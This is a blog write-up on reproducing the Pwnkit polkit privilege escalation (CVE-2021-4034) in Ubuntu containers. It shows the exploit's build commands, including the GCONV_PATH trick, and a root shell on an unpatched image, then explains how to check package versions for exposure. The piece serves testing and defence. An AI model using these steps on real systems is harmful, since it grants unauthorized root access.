Pwnkit is a vulnerability that uses a bug in polkit to elevate permissions to root. This write-up shows how to reproduce it using Ubuntu and what to do to check whether a system is vulnerable.

What went wrong?

Quoting from the original researchers:

This vulnerability is an attacker’s dream come true:

• pkexec is installed by default on all major Linux distributions;
• pkexec is vulnerable since its creation, in May 2009;
• any unprivileged local user can exploit this vulnerability to obtain full root privileges;
• although this vulnerability is technically a memory corruption, it is exploitable instantly, reliably, in an architecture-independent way;
• and it is exploitable even if the polkit daemon itself is not running.

It doesn’t take long to find a GitHub repository that contains an exploit, and looking through the code, it looks pretty straightforward.

Important Note - always read through the code of any exploit you find on the Internet. If you don’t understand what it’s doing, DO NOT blindly run it.

The repository contains the following:

• README: with some instructions
• Makefile: builds the code
• cve-2021-4043.c: main program for running the exploit
• pwnkit.c: library code

All in all 50 lines of code and build instructions. Sounds very simple.

Trying out the exploit

To try out the exploit, I checked the Ubuntu page for CVE-2021-4034 and found that 18.04 was patched while 21.04 was no longer supported.

So first, I stood up a container and dependencies to build the files for the exploit:

1
2
3
4
5
6
7

$ docker run -it ubuntu:18.04
root@c53ebc98cf8d:/# apt-get update
[...]
root@c53ebc98cf8d:/# apt-get install gcc
[...]
root@c53ebc98cf8d:/# apt-get install policykit-1
[...]

In the ubuntu docker container I had to install policykit-1 as the docker image was pretty minimal, but it polkit is pretty standard.

Next I created a standard user:

1
2
3
4
5

root@c53ebc98cf8d:/# adduser testuser
Adding user `testuser' ...
Adding new group `testuser' (1000) ...
Adding new user `testuser' (1000) with group `testuser' ...
[...]

Then I logged in as that user

1
2
3
4
5

root@c53ebc98cf8d:/# login
c53ebc98cf8d login: testuser
Password: 
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 5.10.88-0-virt x86_64)
[...]

To build the exploit, get all the files from the above repository, then use make to build

1
2
3
4
5
6

testuser@c53ebc98cf8d:~$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /bin/true GCONV_PATH=./pwnkit.so:.

And then run it:

1
2
3
4
5
6
7

testuser@c53ebc98cf8d:~$ ./cve-2021-4034 
pkexec --version |
       --help |
       --disable-internal-agent |
       [--user username] PROGRAM [ARGUMENTS...]

See the pkexec manual page for more details.

The above is an indication that the exploit didn’t work - pkexec is patched.

Verify the exploit

To verify that the exploit works, I started Ubuntu 21.04 (no longer supported)

1
2
3
4
5

$ docker run -it ubuntu:21.04
root@3a2e46e2293e:/# apt-get update
[...]
root@3a2e46e2293e:/# apt-get install policykit-1
[...]

Then I created the testuser again and transferred the contents the built exploit onto the system

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

testuser@3a2e46e2293e:~$ tar xfz pwnkit.tgz 
testuser@3a2e46e2293e:~$ ls -l
total 60
drwxrwxr-x 2 testuser testuser  4096 Jan 26 16:54 'GCONV_PATH=.'
-rw-rw-r-- 1 testuser testuser   400 Jan 26 16:53  Makefile
-rwxrwxr-x 1 testuser testuser  8360 Jan 26 16:54  cve-2021-4034
-rw-rw-r-- 1 testuser testuser   274 Jan 26 16:53  cve-2021-4034.c
-rw-rw-r-- 1 testuser testuser    33 Jan 26 16:54  gconv-modules
-rw-rw-r-- 1 testuser testuser   266 Jan 26 16:54  pwnkit.c
-rwxrwxr-x 1 testuser testuser  7984 Jan 26 16:54  pwnkit.so
-rw-r--r-- 1      501 dialout  17364 Jan 26 21:11  pwnkit.tgz

And then ran it again:

1
2
3

testuser@3a2e46e2293e:~$ ./cve-2021-4034 
# whoami
root

Success!

Checking versions

One gotcha I found with this was when I looked for an easy way to check whether polkit is vulnerable:

1
2

$ pkexec --version
pkexec version 0.105

is NOT the right way to do this. I found that when trying a vulnerable image and a patched one, the version came back as the same.

The better way I found was to use (this was ubuntu):

Vulnerable:

1
2
3
4

$ apt-cache policy policykit-1
policykit-1:
  Installed: 0.105-20ubuntu0.18.04.5
  Candidate: 0.105-20ubuntu0.18.04.5

Not vulnerable:

1
2
3
4

$ apt-cache policy policykit-1
policykit-1:
  Installed: 0.105-20ubuntu0.18.04.6
  Candidate: 0.105-20ubuntu0.18.04.6

Compare the version numbers with the information on this page

Conclusion

As this is not a vulnerability that can be remotely triggered, I don’t think this should mean panic stations on log4shell levels, but the public availability of the exploit, the ease of exploiting it and the fact it applies to most distributions should mean only one thing: get patching!

If you'd like to find more of my writing, why not follow me on Bluesky or Mastodon?